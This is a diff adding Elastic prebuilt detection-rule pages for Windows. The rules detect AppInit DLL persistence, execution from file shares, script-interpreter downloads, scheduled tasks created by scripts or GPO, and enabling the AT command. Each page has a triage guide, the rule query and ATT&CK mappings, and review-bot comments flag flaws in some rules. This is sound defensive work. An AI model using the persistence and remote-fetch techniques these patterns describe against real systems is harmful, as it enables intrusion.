@@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll]] +=== Registry Persistence via AppInit DLL + +AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Registry Persistence via AppInit DLL + +AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads `user32.dll`) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. 
+ +Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. + +This rule identifies modifications on the AppInit registry keys. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Review the source process and related DLL file tied to the Windows Registry entry. + - Check whether the DLL is signed, and tied to a authorized program used on your environment. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Retrieve all DLLs under the AppInit registry keys: + - !{osquery{"label":"Osquery - Retrieve AppInit Registry Value","query":"SELECT * FROM registry r where (r.key == 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows' or\nr.key == 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows') and r.name ==\n'AppInit_DLLs'\n"}} +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable and the DLLs using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. 
+ - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. 
+ - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls", + "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls" + ) and not process.executable : ( + "C:\\Windows\\System32\\msiexec.exe", + "C:\\Windows\\SysWOW64\\msiexec.exe", + "C:\\Program Files\\Commvault\\ContentStore*\\Base\\cvd.exe", + "C:\\Program Files (x86)\\Commvault\\ContentStore*\\Base\\cvd.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: AppInit DLLs +** ID: 
T1546.010 +** Reference URL: https://attack.mitre.org/techniques/T1546/010/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc new file mode 100644 index 0000000000..c0332b8444 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc 
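Review bot: the `not process.executable : (...)` exclusions in the rule query hardcode `C:\\Windows\\System32\\msiexec.exe`, `C:\\Windows\\SysWOW64\\msiexec.exe` and the Commvault paths, whereas the RDP rule in the same package uses the `?:\\` drive wildcard; on a system installed to another drive letter these exclusions silently stop matching, so prefer `?:\\Windows\\System32\\msiexec.exe` and so on for consistency. Minor: "tied to a authorized program" in the investigation steps should read "an authorized program", and the opening paragraph of the guide repeats the rule description verbatim.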
@@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-remote-execution-via-file-shares]] +=== Remote Execution via File Shares + +Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Remote Execution via File Shares + +Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for 
the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges needed to write to the network share and restrict write access as needed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [file where host.os.type == "windows" and event.type in ("creation", "change") and + process.pid == 4 and (file.extension : "exe" or file.Ext.header_bytes : "4d5a*")] by host.id, file.path + [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc new file mode 100644 index 0000000000..31098653e2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc 
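Review bot: the guide step "searching for login events (for example, 4624) to the target host after the registry modification" refers to a registry modification that this rule does not involve (the query is a file written by `process.pid == 4` followed by a process start on the same `file.path`/`process.executable`); it reads as copied from a registry rule and should say "after the file was written to the share", and it largely duplicates the earlier "Review adjacent login events (e.g., 4624)" step. Also, the `Data Source: Elastic Endgame` tag is inconsistent with *Rule indices* listing only `logs-endpoint.events.*` (no `endgame-*`); one of the two should change.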
@@ -0,0 +1,136 @@ +[[prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter]] +=== Remote File Download via Script Interpreter + +Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Remote File Download via Script Interpreter + +The Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. + +Attackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals. + +This rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. 
+ +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze both the script and the executable involved using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id + [network where host.os.type == "windows" and process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and + network.direction : ("outgoing", "egress") and network.type == "ipv4" and destination.ip != "127.0.0.1" + ] + [file where host.os.type == "windows" and event.type == "creation" and file.extension : ("exe", "dll")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: 
https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc new file mode 100644 index 0000000000..11da761dd3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc 
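Review bot: the guide step "Investigate potentially compromised accounts ... after the registry modification" again refers to a registry modification this rule does not detect (an outbound network event from `wscript.exe`/`cscript.exe` followed by `.exe`/`.dll` creation). In the query, `network.type == "ipv4"` drops IPv6 downloads entirely while `destination.ip != "127.0.0.1"` excludes only one loopback address, so other 127.0.0.0/8 destinations still fire; consider replacing both with something like `not cidrMatch(destination.ip, "127.0.0.0/8", "::1/128")`. The `sequence by host.id, process.entity_id` also has no `with maxspan` bound, unlike the other sequence rules in this package, so a script host that made one connection and writes an executable much later will still match; add a bound or document why it is omitted.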
@@ -0,0 +1,101 @@ +[[prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script]] +=== Scheduled Task Created by a Windows Script + +A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +Decode the base64 encoded Tasks Actions registry value to investigate the task's configured action. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 30s + [any where host.os.type == "windows" and + (event.category : ("library", "driver") or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and + process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe")] + [registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc new file mode 100644 index 0000000000..86e4de6d47 
--- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc 
@@ -0,0 +1,131 @@ +[[prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo]] +=== Scheduled Task Execution at Scale via GPO + +Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md +* https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md +* https://labs.f-secure.com/tools/sharpgpoabuse +* https://twitter.com/menasec1/status/1106899890377052160 +* https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_gpo_scheduledtasks.yml + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Lateral Movement +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Scheduled Task Execution at Scale via GPO + +Group Policy Objects (GPOs) can be used by attackers to execute scheduled tasks at scale to compromise objects controlled by a given GPO. This is done by changing the contents of the `<GPOPath>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml` file. 
+ +#### Possible investigation steps + +- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation. +- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `<Command>` and `<Arguments>` XML tags for any potentially malicious commands or binaries. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO. + +### False positive analysis + +- Verify if the execution is allowed and done under change management, and if the execution is legitimate. + +### Related rules + +- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf +- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- The investigation and containment must be performed in every computer controlled by the GPO, where necessary. +- Remove the script from the GPO. +- Check if other GPOs have suspicious scheduled tasks attached. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.code: "5136" and winlog.event_data.AttributeLDAPDisplayName:("gPCMachineExtensionNames" or "gPCUserExtensionNames") and + winlog.event_data.AttributeValue:(*CAB54552-DEEA-4691-817E-ED4A4D1AFC72* and *AADCED64-746C-4633-A97C-D61349046527*)) +or +(event.code: "5145" and winlog.event_data.ShareName: "\\\\*\\SYSVOL" and winlog.event_data.RelativeTargetName: *ScheduledTasks.xml and + (message: WriteData or winlog.event_data.AccessList: *%%4417*)) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Domain Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* Sub-technique: +** Name: Group Policy Modification +** ID: T1484.001 +** Reference URL: https://attack.mitre.org/techniques/T1484/001/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Lateral Tool Transfer +** ID: T1570 +** Reference URL: https://attack.mitre.org/techniques/T1570/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc new file mode 100644 index 0000000000..1c5bd4ca3b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc 
@@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled]] +=== Scheduled Tasks AT Command Enabled + +Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-scheduledjob + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Configuration\\EnableAt" + ) and registry.data.strings : ("1", "0x00000001") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or 
Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: At +** ID: T1053.002 +** Reference URL: https://attack.mitre.org/techniques/T1053/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc new file mode 100644 index 0000000000..123eea3090 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc 
